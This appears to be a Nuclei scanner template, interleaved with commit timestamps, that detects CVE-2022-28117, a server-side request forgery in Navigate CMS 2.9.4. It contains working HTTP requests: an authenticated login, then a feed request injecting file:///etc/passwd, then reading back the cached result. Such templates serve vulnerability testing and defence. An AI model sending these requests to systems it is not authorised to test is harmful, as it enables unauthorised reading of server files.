2023-01-17 04:18:15 +00:00
id : CVE-2022-28117
info :
2023-01-24 20:29:43 +00:00
name : Navigate CMS 2.9.4 - Server-Side Request Forgery
2023-01-17 04:18:15 +00:00
author : theabhinavgaur
severity : medium
description : |
2023-01-24 20:29:43 +00:00
Navigate CMS 2.9.4 is susceptible to server-side request forgery via feed_parser class. This can allow a remote attacker to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter, thus enabling possible theft of sensitive information, data modification, and/or unauthorized operation execution.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade to a patched version of Navigate CMS or apply the vendor-provided patch to mitigate the SSRF vulnerability.
2023-01-17 04:18:15 +00:00
reference :
2023-01-17 15:46:06 +00:00
- https://packetstormsecurity.com/files/167063/Navigate-CMS-2.9.4-Server-Side-Request-Forgery.html
- https://www.navigatecms.com/en/blog/development/navigate_cms_update_2_9_5
2023-01-17 21:46:36 +00:00
- https://www.youtube.com/watch?v=4kHW95CMfD0
2023-01-24 20:29:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-28117
2023-01-17 04:18:15 +00:00
classification :
2023-01-17 21:46:36 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N
cvss-score : 4.9
2023-01-17 04:18:15 +00:00
cve-id : CVE-2022-28117
2023-01-17 21:46:36 +00:00
cwe-id : CWE-918
2023-08-31 11:46:18 +00:00
epss-score : 0.01914
2023-10-19 10:38:59 +00:00
epss-percentile : 0.87246
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:*
2023-01-17 04:18:15 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 4
2023-07-11 19:49:27 +00:00
vendor : naviwebs
product : navigate_cms
tags : authenticated,packetstorm,cve,cve2022,ssrf,navigate,cms,lfi,intrusive
2023-01-17 04:18:15 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-01-17 04:18:15 +00:00
- raw :
- |
2023-01-17 05:18:35 +00:00
GET /navigate/login.php HTTP/1.1
2023-01-17 04:18:15 +00:00
Host : {{Hostname}}
- |
2023-01-17 05:18:35 +00:00
POST /navigate/login.php HTTP/1.1
2023-01-17 04:18:15 +00:00
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=---------------------------123456789012345678901234567890
-----------------------------123456789012345678901234567890
Content-Disposition : form-data; name="login-username"
{{username}}
-----------------------------123456789012345678901234567890
Content-Disposition : form-data; name="csrf_token"
{{csrf_token}}
-----------------------------123456789012345678901234567890
Content-Disposition : form-data; name="login-password"
{{password}}
-----------------------------123456789012345678901234567890
- |
2023-01-17 05:18:35 +00:00
POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1
2023-01-17 04:18:15 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
limit=5&language=en&url=file:///etc/passwd
- |
2023-01-17 05:18:35 +00:00
GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1
2023-01-17 04:18:15 +00:00
Host : {{Hostname}}
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2023-01-17 04:18:15 +00:00
matchers-condition : and
matchers :
2023-01-17 15:46:06 +00:00
- type : regex
2023-01-17 04:18:15 +00:00
part : body
2023-01-17 15:46:06 +00:00
regex :
- "root:.*:0:0:"
2023-01-17 04:18:15 +00:00
- type : status
status :
- 200
extractors :
- type : regex
name : csrf_token
group : 1
regex :
2023-07-11 19:49:27 +00:00
- csrf_token" value="([a-f0-9]{64})
2023-01-17 15:46:06 +00:00
internal : true
2023-07-11 19:49:27 +00:00
part : body
2023-10-19 13:13:52 +00:00
# digest: 4a0a00473045022044c63d943c1fa9fa0861451abde39b1a620364bf10c58a467748bcf53911e4a9022100babc800098c0ff8311d77de63205b39cb51444d329ef7910ef8fdd528e9a30f6:922c64590222798bb761d5b6d8e72950